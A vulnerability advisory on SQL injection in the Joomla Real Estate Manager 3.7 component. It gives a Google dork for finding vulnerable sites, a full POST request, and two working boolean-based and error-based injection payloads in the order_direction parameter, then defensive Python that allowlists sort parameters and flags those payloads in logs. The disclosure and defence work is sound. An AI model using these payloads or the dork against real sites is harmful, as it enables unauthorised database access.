This vulnerability was found in the Joomla CMS component Real Estate Manager, version 3.7. The vulnerability type is SQLi (SQL injection). I found it on October 10th, 2015, and submitted the finding to the vendor of the component; they fixed it in the next version.
A Metasploit exploit module can be found here: https://www.rapid7.com/db/modules/auxiliary/gather/joomla_com_realestatemanager_sqli
REMARK: This vulnerability was found and tested on localhost.
#Component description on vendor page:
Real Estate Manager is a handy Joomla rental component and a powerful solution for real estate website creation and property management. It fits perfectly for independent estate realtors, property rental companies and agencies, motel booking, hotel room booking, property rental, real estate selling and realty management.
# Additional information about the component:
# Title of the vulnerability/exploit: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Author of the vulnerability/exploit: [Omer Ramić]
# Vendor website: [http://ordasoft.com/]
# Link to software: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all older versions
# Platform it was tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
Parameter 1: order_direction (POST)
Parameter 2: order_field (POST)

Baseline request (no injection; Content-Length 37 matches the body below):

POST /index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0; 9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

order_direction=asc&order_field=price
Proof-of-concept request bodies: the injected subquery is appended to order_direction after the comma, so it lands inside the ORDER BY clause. The first is a boolean-based test, the second a MySQL error-based test (duplicate-entry via FLOOR(RAND(0)*2) ... GROUP BY):

order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&order_field=price
order_direction=asc,(SELECT 1841 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
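The vendor's actual fix is not reproduced here. The following is an added example (not the component's code and not the Metasploit module) showing the defensive pattern for ORDER BY parameters: an allowlist of column names and sort directions, so the raw parameter is never interpolated into SQL, plus a log-side sweep that runs the same allowlist over captured POST bodies and flags the two payloads above. The column names in ALLOWED_FIELDS are assumptions.

```python
from urllib.parse import parse_qs

# Assumed sortable columns; the real component would derive these from its own schema.
ALLOWED_FIELDS = {"price", "name", "date_added"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def build_order_clause(order_field: str, order_direction: str) -> str:
    """Return a safe ORDER BY fragment or raise ValueError.

    The vulnerable pattern concatenates the raw parameters, so a value such as
    'asc,(SELECT ...)' appends an attacker-controlled subquery. Checking each
    value against a fixed set means only a known constant is ever interpolated.
    """
    field = order_field.strip().lower()
    direction = order_direction.strip().lower()
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"order_field not allowed: {order_field!r}")
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"order_direction not allowed: {order_direction!r}")
    return f"ORDER BY {field} {direction.upper()}"


def flag_suspicious_bodies(bodies):
    """Return indexes of POST bodies whose sort parameters fail the allowlist.

    Useful for sweeping captured form posts to com_realestatemanager: a value
    the allowlist rejects is either a client bug or an injection attempt.
    """
    flagged = []
    for i, body in enumerate(bodies):
        params = parse_qs(body, keep_blank_values=True)
        field = params.get("order_field", [""])[0]
        direction = params.get("order_direction", [""])[0]
        try:
            build_order_clause(field, direction)
        except ValueError:
            flagged.append(i)
    return flagged


# Constructed sample: the advisory's baseline body followed by its two payloads.
SAMPLE_BODIES = [
    "order_direction=asc&order_field=price",
    "order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&order_field=price",
    "order_direction=asc,(SELECT 1841 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price",
]

if __name__ == "__main__":
    print(build_order_clause("price", "asc"), flag_suspicious_bodies(SAMPLE_BODIES))
```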